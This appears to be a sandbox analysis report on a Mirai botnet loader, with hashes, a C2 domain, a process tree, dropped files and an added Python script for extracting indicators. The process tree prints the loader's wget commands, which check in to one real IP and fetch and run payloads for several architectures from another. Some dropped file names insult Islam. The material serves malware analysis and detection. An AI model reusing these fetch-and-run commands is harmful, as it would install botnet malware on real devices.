Analysis

  • max time kernel
    176s
  • max time network
    178s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240611-en
  • resource tags
    arch:mips
    image:debian9-mipsbe-20240611-en
    kernel:4.9.0-13-4kc-malta
    locale:en-us
    os:debian-9-mips
    system
  • submitted
    02/09/2024, 01:10

General

  • Target

    85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1.unknown

  • Size

    8KB

  • MD5

    86311599eaaff9e71ddc72ada1b21c2e

  • SHA1

    572f97e41071d072dfc97127454d4978b50a81e2

  • SHA256

    85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1

  • SHA512

    74fccf9b268bdcf4220dcd8213a83213b7be545bfaf7cf406f32bf7e7c924ef53d66d04cb3aeb4c8024c60803ce806ddfb501ad0d59780780fc9dd19f40df317

  • SSDEEP

    96:RE+blpgA856Hslefac5h5k9vH658TuF4dZAkk59yKXMJeDMhsm/vj+9RlYz218Lu:RE+P7

Score
10/10

Malware Config

Extracted

Family

mirai

C2

www.akck.ru

Signatures

  • Mirai

    Mirai is a prevalent Linux botnet family that infects exposed network devices (routers, cameras and other embedded systems) and is typically delivered by a multi-architecture loader like the one seen in the process tree below.

  • Executes dropped EXE (9 IoCs)
  • Writes file to system bin folder (1 TTP, 14 IoCs)
  • Changes its process name (1 IoC)
  • Reads runtime system information (3 IoCs)

    Reads data from the /proc virtual filesystem.

Processes

  • /tmp/85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1.unknown
    /tmp/85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1.unknown
    1⤵
    • Writes file to system bin folder
    PID:714
    • /usr/bin/id
      id
      2⤵
      • Reads runtime system information
      PID:717
    • /bin/sed
      sed -n "s/^uid=[0-9]\\+(\\([^)]\\+\\)).*/\\1/p"
      2⤵
      • Reads runtime system information
      PID:718
    • /usr/bin/whoami
      whoami
      2⤵
      PID:725
    • /usr/bin/wget
      wget "http://45.152.112.46/firmware_v4?user=root&dir=/bin"
      2⤵
      • Writes file to system bin folder
      PID:728
    • /usr/bin/wget
      wget http://45.159.211.121/firmware/firmware.x86_64 -O feankzzyx
      2⤵
      • Writes file to system bin folder
      PID:739
    • /bin/chmod
      chmod 0755 ./feankzzyx
      2⤵
      PID:751
    • /bin/feankzzyx
      ./feankzzyx
      2⤵
      • Executes dropped EXE
      PID:752
    • /usr/bin/wget
      wget http://45.159.211.121/firmware/firmware.armv4l -O feankzzyx
      2⤵
      • Writes file to system bin folder
      PID:754
    • /bin/chmod
      chmod 0755 ./feankzzyx
      2⤵
      PID:755
    • /bin/feankzzyx
      ./feankzzyx
      2⤵
      • Executes dropped EXE
      PID:756
    • /usr/bin/wget
      wget http://45.159.211.121/firmware/firmware.armv5l -O feankzzyx
      2⤵
      • Writes file to system bin folder
      PID:758
    • /bin/chmod
      chmod 0755 ./feankzzyx
      2⤵
      PID:759
    • /bin/feankzzyx
      ./feankzzyx
      2⤵
      • Executes dropped EXE
      PID:760
    • /usr/bin/wget
      wget http://45.159.211.121/firmware/firmware.armv6l -O feankzzyx
      2⤵
      • Writes file to system bin folder
      PID:762
    • /bin/chmod
      chmod 0755 ./feankzzyx
      2⤵
      PID:763
    • /bin/feankzzyx
      ./feankzzyx
      2⤵
      • Executes dropped EXE
      PID:764
    • /usr/bin/wget
      wget http://45.159.211.121/firmware/firmware.armv7l -O feankzzyx
      2⤵
      • Writes file to system bin folder
      PID:766
    • /bin/chmod
      chmod 0755 ./feankzzyx
      2⤵
      PID:777
    • /bin/feankzzyx
      ./feankzzyx
      2⤵
      • Executes dropped EXE
      PID:779
    • /usr/bin/wget
      wget http://45.159.211.121/firmware/firmware.i586 -O feankzzyx
      2⤵
      • Writes file to system bin folder
      PID:782
    • /bin/chmod
      chmod 0755 ./feankzzyx
      2⤵
      PID:795
    • /bin/feankzzyx
      ./feankzzyx
      2⤵
      • Executes dropped EXE
      PID:797
    • /usr/bin/wget
      wget http://45.159.211.121/firmware/firmware.i686 -O feankzzyx
      2⤵
      • Writes file to system bin folder
      PID:800
    • /bin/chmod
      chmod 0755 ./feankzzyx
      2⤵
      PID:815
    • /bin/feankzzyx
      ./feankzzyx
      2⤵
      • Executes dropped EXE
      PID:816
    • /usr/bin/wget
      wget http://45.159.211.121/firmware/firmware.m68k -O feankzzyx
      2⤵
      • Writes file to system bin folder
      PID:819
    • /bin/chmod
      chmod 0755 ./feankzzyx
      2⤵
      PID:824
    • /bin/feankzzyx
      ./feankzzyx
      2⤵
      • Executes dropped EXE
      PID:825
    • /usr/bin/wget
      wget http://45.159.211.121/firmware/firmware.mips -O feankzzyx
      2⤵
      • Writes file to system bin folder
      PID:827
    • /bin/chmod
      chmod 0755 ./feankzzyx
      2⤵
      PID:828
    • /bin/feankzzyx
      ./feankzzyx
      2⤵
      • Executes dropped EXE
      • Changes its process name
      PID:829
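The process tree above is the whole story of this sample: it fingerprints the user (id piped through sed, then whoami), reports in to one host with user= and dir= query parameters, and then walks a list of architecture-specific payloads from a second host, each time writing to the same output name in /bin, marking it executable and running it. As an added example (not code from the Triage report or from the sample), the Python below pulls those indicators out of such a process tree and flags every completed wget -O / chmod / execute chain. The PROCESS_TREE list is constructed from the command lines in the Processes section (three of the nine architecture variants are kept, to stay short); the function names are this example's own.

```python
"""Extract IOCs from a Linux sandbox process tree and flag the
download -> chmod -> execute loader chain. Added example; the
sample data below is constructed from the report's process list."""
import re
import shlex
from urllib.parse import parse_qs, urlsplit

URL_RE = re.compile(r"""https?://[^\s"']+""")

# (pid, command line) pairs, constructed from the Processes section above.
PROCESS_TREE = [
    (714, "/tmp/85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1.unknown"),
    (717, "id"),
    (718, r'sed -n "s/^uid=[0-9]\\+(\\([^)]\\+\\)).*/\\1/p"'),
    (725, "whoami"),
    (728, 'wget "http://45.152.112.46/firmware_v4?user=root&dir=/bin"'),
    (739, "wget http://45.159.211.121/firmware/firmware.x86_64 -O feankzzyx"),
    (751, "chmod 0755 ./feankzzyx"),
    (752, "./feankzzyx"),
    (766, "wget http://45.159.211.121/firmware/firmware.armv7l -O feankzzyx"),
    (777, "chmod 0755 ./feankzzyx"),
    (779, "./feankzzyx"),
    (827, "wget http://45.159.211.121/firmware/firmware.mips -O feankzzyx"),
    (828, "chmod 0755 ./feankzzyx"),
    (829, "./feankzzyx"),
]


def basename(path):
    return path.rsplit("/", 1)[-1]


def wget_output_name(argv):
    """Return the -O / --output-document target of a wget argv, or None."""
    for i, arg in enumerate(argv[1:], start=1):
        if arg == "-O" and i + 1 < len(argv):
            return argv[i + 1]
        if arg.startswith("-O") and len(arg) > 2:
            return arg[2:]
        if arg.startswith("--output-document="):
            return arg.split("=", 1)[1]
    return None


def makes_executable(mode):
    """True if a chmod mode (octal like 0755 or symbolic like +x) sets an execute bit."""
    if mode.isdigit():
        return int(mode, 8) & 0o111 != 0
    return "x" in mode


def extract_urls(tree):
    """Every http(s) URL appearing in any command line, in tree order."""
    return [u for _pid, cmd in tree for u in URL_RE.findall(cmd)]


def extract_hosts(tree):
    return sorted({urlsplit(u).hostname for u in extract_urls(tree)})


def find_checkins(tree):
    """wget fetches with no output file whose query string carries host
    details (user=, dir=): the loader reporting in rather than downloading."""
    hits = []
    for pid, cmd in tree:
        argv = shlex.split(cmd)
        if not argv or basename(argv[0]) != "wget" or wget_output_name(argv):
            continue
        for url in URL_RE.findall(cmd):
            query = parse_qs(urlsplit(url).query)
            if "user" in query or "dir" in query:
                hits.append({"pid": pid, "url": url,
                             "params": {k: v[0] for k, v in query.items()}})
    return hits


def find_loader_chains(tree):
    """Match wget -O <name> ... chmod <exec mode> <name> ... ./<name>.
    The loader reuses one output name per architecture, so each completed
    chain is emitted and the name freed for the next download."""
    chains, pending = [], {}
    for pid, cmd in tree:
        argv = shlex.split(cmd)
        if not argv:
            continue
        prog = basename(argv[0])
        if prog == "wget":
            name, urls = wget_output_name(argv), URL_RE.findall(cmd)
            if name and urls:
                last = basename(urlsplit(urls[0]).path)  # e.g. firmware.mips
                pending[basename(name)] = {
                    "url": urls[0], "host": urlsplit(urls[0]).hostname,
                    "arch": last.rsplit(".", 1)[-1] if "." in last else last,
                    "name": basename(name), "pids": [pid], "stage": "download"}
        elif prog == "chmod" and len(argv) >= 3:
            chain = pending.get(basename(argv[-1]))
            if chain and chain["stage"] == "download" and makes_executable(argv[1]):
                chain["stage"] = "chmod"
                chain["pids"].append(pid)
        elif prog in pending and pending[prog]["stage"] == "chmod":
            chain = pending.pop(prog)
            chain["pids"].append(pid)
            chain["stage"] = "executed"
            chains.append(chain)
    return chains


if __name__ == "__main__":
    print("hosts:", extract_hosts(PROCESS_TREE))
    for c in find_checkins(PROCESS_TREE):
        print("check-in:", c["url"], c["params"])
    for c in find_loader_chains(PROCESS_TREE):
        print(f"loader chain pids={c['pids']} arch={c['arch']} url={c['url']}")
```

Run against the constructed tree this reports two hosts, the single check-in to 45.152.112.46 with user=root and dir=/bin, and one completed chain per architecture, all writing the same name feankzzyx. That reuse of one output path is why the report lists /bin/feankzzyx twice with different sizes: each wget overwrote the previous payload. Of the nine ./feankzzyx launches only the last, the MIPS variant (PID 829), also carries the Changes its process name signature, which is consistent with it being the one that actually ran on the debian-9_mips platform. Note that the extracted C2 in the Malware Config (www.akck.ru) is a third indicator that does not appear in any command line, so a process-tree scrape alone does not replace config extraction.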

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /bin/ALLAH_IS_EVIL.txt

    Filesize

    828B

    MD5

    654d89fdcfd44330b80fc359d544adb9

    SHA1

    53ff7c283c7bab6b7071510349b7785e54da5454

    SHA256

    43a54d24621ffaa1dea049234cc1296ec4f1a8285c4c90254202329d9762ca75

    SHA512

    d3e32c72576fea7cb0d30957818c8ee61fa951fd7ff59a6fb462b53fe44559cf9eb501e9dad03d05703b4d6b33854ee062a3ba6ef940c46d7fef92a5c278d857

  • /bin/allah_is_satan

    Filesize

    15B

    MD5

    640832e65d903e762b84b766ea39ed8e

    SHA1

    a35a203fbae4b913edbd5f00cfc92fe076e39532

    SHA256

    68bf38c7874a4b54ed0dcc53ee8c55194ad2437818a577364a5735a56a819c2b

    SHA512

    f22f27d22110c3ec9f95a84617dbe49d4d59295bce184c31ceac5b5cffed1494107b25d48d1ecedab7c0a2d8ef377e7008732950fee903269c1d1fbdb126449b

  • /bin/current_user2

    Filesize

    5B

    MD5

    74cc1c60799e0a786ac7094b532f01b1

    SHA1

    552c0ba71b1046a083583ebf943cc9aa09f39a32

    SHA256

    53175bcc0524f37b47062fafdda28e3f8eb91d519ca0a184ca71bbebe72f969a

    SHA512

    21e1bc024bd76c76b68e04614c6def5b03fd4b658e59bfde065b464b520f463711b795455e3a5c81a8a1946b2bca2f83d6c19300a4d3326ce17959a7cbc0846a

  • /bin/feankzzyx

    Filesize

    10B

    MD5

    7d91028619a806f35dac54dd9f656276

    SHA1

    ce782d0d9bc3b79aaeb84d1ac8ae4c104aec875e

    SHA256

    8227203f32d8b00aa0ed784d3f0e11c722f3471d6a99976ee12fa12039fa0484

    SHA512

    9a1e0280c742cfc2e725115bc9b902bd6ff8bdfd5e6c40b65c5de320a174b3db5c0252145101867b80f3d5b6b6d354fc93481f5c34474b30e6e176987e09a956

  • /bin/feankzzyx

    Filesize

    137KB

    MD5

    bcae0ad478a4924fab82304db8203eed

    SHA1

    2e4c52e260bfdaab1f317860ce9455d7a80519e6

    SHA256

    7e9239395e7fa0547d8782ecf1b6213ebdab113095406702fb076741f9e51907

    SHA512

    73b3a42b595ee8a298ff5dd2ee466628d99ad58625cd3791e671bf91b61acb534dcdae0e87ed279f63b07af0460440b5dec263b3aa8a3bfc47db2925c86d3cc6

  • /bin/firmware_v4?user=root&dir=%2Fbin

    Filesize

    4B

    MD5

    2a76ee31e49f38759ed046466b52a513

    SHA1

    e31dcb09b650cd3ab532a902888c33da96f45c55

    SHA256

    7ca1e25edd006f00775c737c9f1062a685ce2f897ceb52ce6a2bad7292257c1f

    SHA512

    e9c4932f7cd5ec940b1de3a82fa19dfc17f19e1eb7c8ef2ed435e637d0a5170d0ef0a5fad37f9092290e9e6bc1b6cea37c45b98a099426264720d57cfa5e93a9

  • /etc/d

    Filesize

    10B

    MD5

    61ef923b8276f307b7f125a9acc8f004

    SHA1

    37c300cd00115e00f1aff0d227fc6cd38de572b2

    SHA256

    3b0aa99677bf9f40c322e3bccaa0e2079e7a99e5516562022c443465e8f9f56e

    SHA512

    ea54b8caf3a95c08b132c8b3ba711cfbf992927d7c1d5463d9006b8003190891b2f8ea1302c68dae28c5f7fcdf7b2b7eefbafde9a3129e76e906eea63d5c84ea